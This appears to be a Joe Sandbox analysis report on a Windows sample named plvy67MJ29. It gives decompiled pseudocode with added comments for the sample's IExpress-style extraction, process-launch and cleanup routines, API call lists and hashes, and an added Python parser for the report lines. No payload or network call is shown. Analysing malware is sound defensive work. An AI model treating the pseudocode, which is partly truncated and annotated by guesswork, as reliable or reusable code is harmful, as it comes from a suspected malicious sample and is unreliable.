                                                                                                                                                                                                    0x00000000

APIs
  • Part of subcall function 00FD7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00FD7182
  • Part of subcall function 00FD7155: GetCurrentProcessId.KERNEL32 ref: 00FD7191
  • Part of subcall function 00FD7155: GetCurrentThreadId.KERNEL32 ref: 00FD719A
  • Part of subcall function 00FD7155: GetTickCount.KERNEL32 ref: 00FD71A3
  • Part of subcall function 00FD7155: QueryPerformanceCounter.KERNEL32(?), ref: 00FD71B8
• GetStartupInfoW.KERNEL32(?,00FD72B8,00000058), ref: 00FD6A7F
• Sleep.KERNEL32(000003E8), ref: 00FD6AB4
• _amsg_exit.MSVCRT ref: 00FD6AC9
• _initterm.MSVCRT ref: 00FD6B1D
• __IsNonwritableInCurrentImage.LIBCMT ref: 00FD6B49
• exit.KERNELBASE ref: 00FD6BBF
• _ismbblead.MSVCRT ref: 00FD6BDA
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
• String ID:
• API String ID: 836923961-0
• Opcode ID: a6103f49f7bb743d56fa7f53c6093c26adc5a52e4573b392f3772356491f292a
• Instruction ID: 575c2cd32e0a087360c491f454da633f41695d21087598f79aadd4cf887b3149
• Opcode Fuzzy Hash: a6103f49f7bb743d56fa7f53c6093c26adc5a52e4573b392f3772356491f292a
• Instruction Fuzzy Hash: E841D231D453699BDB21AB78DC05B6A77A3FB84761F1C411BE841E7390DB788842BB81
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of function fd58c8 (basic blocks fd58c8 to fd597b; imported calls on the path: LocalAlloc, CreateFileA, LocalFree, CloseHandle, GetFileAttributesA); rendered graph with its Executed / Not Executed legend omitted]
C-Code - Quality: 95%
E00FD58C8(intOrPtr* __ecx) {
	void* _v8;
	intOrPtr _t6;
	void* _t10;
	void* _t12;
	void* _t14;
	signed char _t16;
	void* _t20;
	void* _t23;
	intOrPtr* _t27;
	CHAR* _t33;

	_push(__ecx);
	_t33 = __ecx;
	_t27 = __ecx;
	_t23 = __ecx + 1;
	do {
		_t6 =  *_t27;
		_t27 = _t27 + 1;
                                                                                                                                                                                                    				} while (_t6 != 0);
                                                                                                                                                                                                    				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                    				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                                                                                    					E00FD1680(_t20, _t36, _t33);
                                                                                                                                                                                                    					E00FD658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                    					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                    					_v8 = _t10;
                                                                                                                                                                                                    					LocalFree(_t20);
                                                                                                                                                                                                    					_t12 = _v8;
                                                                                                                                                                                                    					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                    						goto L4;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						CloseHandle(_t12);
                                                                                                                                                                                                    						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                    						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0xfd9124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E00FD44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    					_t14 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                    			}

APIs
• LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00FD5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD58E7
• CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00FD5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5943
• LocalFree.KERNEL32(00000000,?,00FD5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD594D
• CloseHandle.KERNEL32(00000000,?,00FD5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD595C
• GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00FD5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5963
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
• API String ID: 747627703-3705647674
• Opcode ID: da08800595831284bb4d855cd4705d4e7166be2ac7f40946305bd36db8b7cf0b
• Instruction ID: 54244aac8907189a7d764ffb2339b7878106f09188bf5e6fd596ba0843f4a7b9
• Opcode Fuzzy Hash: da08800595831284bb4d855cd4705d4e7166be2ac7f40946305bd36db8b7cf0b
• Instruction Fuzzy Hash: A5112232A012246BC7205FB9AC0EB9B7F9BEF46770B180617B50AD33D1CA74D805B6A5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Graph for E00FD3FEF, basic blocks fd3fef to fd411a; the rendered graphic is not reproduced here. Blocks call CreateProcessA, WaitForSingleObject, GetExitCodeProcess, GetLastError, FormatMessageA and CloseHandle, plus the internal routines fd6285, fd44b9, fd411b and fd6ce0.]
C-Code - Quality: 84%
// Launches the command line in __ecx with the supplied STARTUPINFOA and waits for it.
// The decompiled body is truncated in this report after the error path.
int E00FD3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
    signed int _v8;
    char _v524;
    long _v528;
    struct _PROCESS_INFORMATION _v544;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t20;
    void* _t22;
    int _t25;
    intOrPtr* _t39;
    signed int _t44;
    void* _t49;
    signed int _t50;
    intOrPtr _t53;
    intOrPtr _t45;   // not declared in the decompiler output: __edx, later the message id 0x4c4

    _t45 = __edx;
    _t20 =  *0xfd8004; // 0x42de454f, the stack security cookie
    _v8 = _t20 ^ _t50;                     // cookie XOR esp, checked again in the epilogue
    _t39 = __ecx;
    _t49 = 1;
    _t22 = 0;
    if(__ecx == 0) {
        L13:
        return E00FD6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
    }
    asm("stosd");                          // four stosd: zero the 16-byte PROCESS_INFORMATION
    asm("stosd");
    asm("stosd");
    asm("stosd");
    // 0x20 = NORMAL_PRIORITY_CLASS; no inherited handles, no environment, no current directory
    _t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
    if(_t25 == 0) {
         *0xfd9124 = E00FD6285();
        // 0x1000 = FORMAT_MESSAGE_FROM_SYSTEM: render the last error into _v524
        FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
        _t45 = 0x4c4;
        E00FD44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
        L11:
        _t49 = 0;
        L12:
        _t22 = _t49;
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                    				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                    				_t44 = _v528;
                                                                                                                                                                                                    				_t53 =  *0xfd8a28; // 0x0
                                                                                                                                                                                                    				if(_t53 == 0) {
                                                                                                                                                                                                    					_t34 =  *0xfd9a2c; // 0x0
                                                                                                                                                                                                    					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                    						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                    						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                    							 *0xfd9a2c = _t44;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E00FD411B(_t34, _t44);
                                                                                                                                                                                                    				CloseHandle(_v544.hThread);
                                                                                                                                                                                                    				CloseHandle(_v544);
                                                                                                                                                                                                    				if(( *0xfd9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
APIs
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00FD4033
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FD4049
• GetExitCodeProcess.KERNELBASE ref: 00FD405C
• CloseHandle.KERNEL32(?), ref: 00FD409C
• CloseHandle.KERNEL32(?), ref: 00FD40A8
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00FD40DC
• FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00FD40E9
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-0
• Opcode ID: e5eb5c9b5cf8bc5464dae708817661577b9c1668ecb05398dd01b7d79e083b92
• Instruction ID: a09852959100f09448965daa18f96b63ccbfda2fbdf9d1e8946439989f01aced
• Opcode Fuzzy Hash: e5eb5c9b5cf8bc5464dae708817661577b9c1668ecb05398dd01b7d79e083b92
• Instruction Fuzzy Hash: 2D31B132A4221CABEB209B75DC4DFAB777AEB94710F1401ABF505D2261C6345C85EF15
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E00FD51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E00FD468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E00FD468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E00FD44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0xfd9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0xfd9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E00FD44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0xfd9124 = 0x80070714;
					goto L10;
				}
				E00FD44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xfd9124 = E00FD6285();
				goto L10;
			}






Decompiler address column for the listing above (one entry per line; extraction flattened it into a column): 0x00fd51fb 0x00fd5207 0x00fd520b 0x00fd523c 0x00fd5268 0x00fd5270 0x00fd528b 0x00fd5293 0x00fd529c 0x00fd52a6 0x00fd52b0 0x00000000 0x00fd52b0 0x00fd529e 0x00fd5279 0x00000000 0x00fd527b 0x00fd5273 0x00000000 0x00fd5273 0x00fd524a 0x00fd5250 0x00fd5256 0x00000000 0x00fd5256 0x00fd5219 0x00fd5223 0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                      • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FD2F4D,?,00000002,00000000), ref: 00FD5201
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00FD5250
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                      • Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                    • Opcode ID: 471245a2e79b1d45a80fd8c4a92d71e416b9fe7a721d42d3ea5d01a581d5cb16
                                                                                                                                                                                                    • Instruction ID: 6c7d27908d18bde8da87365df6245645404a5717a873dca5d77b925bb99c45c2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 471245a2e79b1d45a80fd8c4a92d71e416b9fe7a721d42d3ea5d01a581d5cb16
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E71108726022057BD3146BB15C4AF3B729FEB8A751B18402BFA02D6390DABD9C007128
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%
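The annotation lines under "APIs" have a regular shape (an optional "Part of subcall function <addr>:" prefix, then API.MODULE(args), then "ref: <call site>"), which makes them easy to turn into structured records for triage: which calls are direct, which are reached through a wrapper such as 00FD44B9 (LoadStringA + MessageBoxA), and which string literals (TITLE, nst0dum) flow into the calls. The parser below is an added example, not part of this report or of Joe Sandbox's tooling; the sample text embedded in it is the twelve annotation lines above copied verbatim, and the rule that an eight-hex-digit token is a numeric argument while anything else is a string literal is an assumption about the report format.

```python
"""Parse Joe Sandbox per-function 'APIs' annotation lines into structured records.
Added example; the sample lines are the ones printed above for this function."""
import re
from dataclasses import dataclass
from typing import Optional

# Sample input: the API annotation lines shown above (constructed from the page text).
SAMPLE = """\
• Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
• Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
• Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
• Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
• Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
• Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
• Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FD2F4D,?,00000002,00000000), ref: 00FD5201
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00FD5250
• Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
• Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
• Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
"""

# One annotation line: [bullet] [Part of subcall function XXXXXXXX:] api.MODULE[(args)] [,] ref: XXXXXXXX
LINE_RE = re.compile(
    r"^\s*•?\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_.]+)"
    r"(?:\((?P<args>.*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list              # int for 8-hex-digit tokens, None for '?', str otherwise
    ref: int                # address of the call instruction
    subcall: Optional[int]  # address of the wrapper function when the call is indirect


def parse_arg(tok: str):
    """Assumption: an 8-hex-digit token is a value the sandbox observed; '?' is unknown;
    anything else is a string literal (a literal such as DEADBEEF would be misread)."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_lines(text: str) -> list:
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] is not None else []
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def direct_calls(calls: list) -> list:
    """Calls made by the function itself rather than by a wrapper it invokes."""
    return [c for c in calls if c.subcall is None]


def by_subcall(calls: list) -> dict:
    """Map wrapper address (None for direct calls) -> API names, in report order."""
    tree = {}
    for c in calls:
        tree.setdefault(c.subcall, []).append(c.api)
    return tree


def string_args(calls: list) -> set:
    """String literals that reach any API call (resource names, captions, paths)."""
    return {a for c in calls for a in c.args if isinstance(a, str)}


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for sub, apis in by_subcall(parsed).items():
        print("direct" if sub is None else f"via {sub:08X}", "->", ", ".join(apis))
    print("strings:", sorted(string_args(parsed)))
```

The wrapper grouping is what makes the listing readable: 00FD468F is the resource reader (FindResource/SizeofResource/LoadResource/LockResource/memcpy_s/FreeResource), 00FD44B9 is the message-box helper, and the function body itself only touches LocalAlloc/LocalFree.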

                                                                                                                                                                                                    C-Code - Quality: 74%
			E00FD52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				// Cleanup routine: deletes every file extracted into the temporary directory,
				// frees the list that tracked them, then steps out of and tears down the directory.
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0xfd8004; // 0x42de454f, /GS stack-cookie seed; verified by E00FD6CE0 on return
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0xfd91e0; // 0x33d8f70, head of a singly linked list of extracted files: node = { CHAR* path; node* next }
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0xfd8a24 == 0 &&  *0xfd9a30 == 0) { // two globals gate deletion; both were zero in this run, since the calls below are marked executed
							SetFileAttributesA( *_t31, 0x80); // executed; 0x80 = FILE_ATTRIBUTE_NORMAL, clears read-only/hidden so the delete cannot be refused
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1]; // advance to the next node before freeing the current one
						LocalFree( *_t29); // the path string
						LocalFree(_t29); // the node
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0xfd8a20; // 0x0, guards the directory teardown below
				_pop(_t32);
				if(_t11 != 0 &&  *0xfd8a24 == 0 &&  *0xfd9a30 == 0) {
					_push(_t22);
					E00FD1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\"); // copy the extraction directory path into a MAX_PATH (0x104) buffer; IXPnnn.TMP is the naming used by the IExpress/wextract self-extractor
					if(( *0xfd9a34 & 0x00000020) != 0) {
						E00FD65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed; a process cannot remove its own current directory, so it steps out first
					_t22 =  &_v268;
					E00FD2390( &_v268); // operates on the extraction directory path (body not in this section)
					_t11 =  *0xfd8a20; // 0x0
				}
				if( *0xfd9a40 != 1 && _t11 != 0) {
					_t11 = E00FD1FE1(_t22); // executed
				}
				 *0xfd8a20 =  *0xfd8a20 & 0x00000000; // clear the flag once the directory has been handled
				return E00FD6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32); // stack-cookie check and epilogue
			}












Decompiler address column for the listing above (one entry per line; extraction flattened it into a column): 0x00fd52b6 0x00fd52b6 0x00fd52b6 0x00fd52c1 0x00fd52c8 0x00fd52cb 0x00fd52cc 0x00fd52d4 0x00fd52d6 0x00fd52d7 0x00fd52de 0x00fd52e0 0x00fd52f2 0x00fd52fa 0x00fd52fa 0x00fd5302 0x00fd5305 0x00fd530c 0x00fd5312 0x00fd5316 0x00fd5316 0x00fd5317 0x00fd531c 0x00fd531f 0x00fd5333 0x00fd5345 0x00fd5351 0x00fd5359 0x00fd5359 0x00fd5363 0x00fd5369 0x00fd536f 0x00fd5374 0x00fd5374 0x00fd5381
                                                                                                                                                                                                    0x00fd5387
                                                                                                                                                                                                    0x00fd5387
                                                                                                                                                                                                    0x00fd538f
                                                                                                                                                                                                    0x00fd53a0

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(033D8F70,00000080,?,00000000), ref: 00FD52F2
                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(033D8F70), ref: 00FD52FA
                                                                                                                                                                                                    • LocalFree.KERNEL32(033D8F70,?,00000000), ref: 00FD5305
                                                                                                                                                                                                    • LocalFree.KERNEL32(033D8F70), ref: 00FD530C
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(00FD11FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD5363
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00FD5334
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                    • API String ID: 2833751637-256195474
                                                                                                                                                                                                    • Opcode ID: 140ebd4e5f091dc37d6b1c57e71f9c286f207dcdcbe41ee36aee8ca770397fd9
                                                                                                                                                                                                    • Instruction ID: 4ce054be4e2307af83c6334f5f4914ca3892ac05203ec144b496f9ceffbd5dac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 140ebd4e5f091dc37d6b1c57e71f9c286f207dcdcbe41ee36aee8ca770397fd9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5421D432906618EBCB20AB74EC09B6937A3BB00BA1F0C015BE441563A0CFF95C85FB40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD1FE1(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				if( *0xfd8530 != 0) {
                                                                                                                                                                                                    					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                    					if(_t4 == 0) {
                                                                                                                                                                                                    						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
                                                                                                                                                                                                    						return RegCloseKey(_v8);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                    			}


                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00FD538C,?,?,00FD538C), ref: 00FD2005
                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(00FD538C,wextract_cleanup3,?,?,00FD538C), ref: 00FD2017
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00FD538C,?,?,00FD538C), ref: 00FD2020
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
                                                                                                                                                                                                    • API String ID: 849931509-2968168367
                                                                                                                                                                                                    • Opcode ID: 4779a972526070d76989c59d9f8dc1a2906e18eaa5f45491d52992b945cba1bb
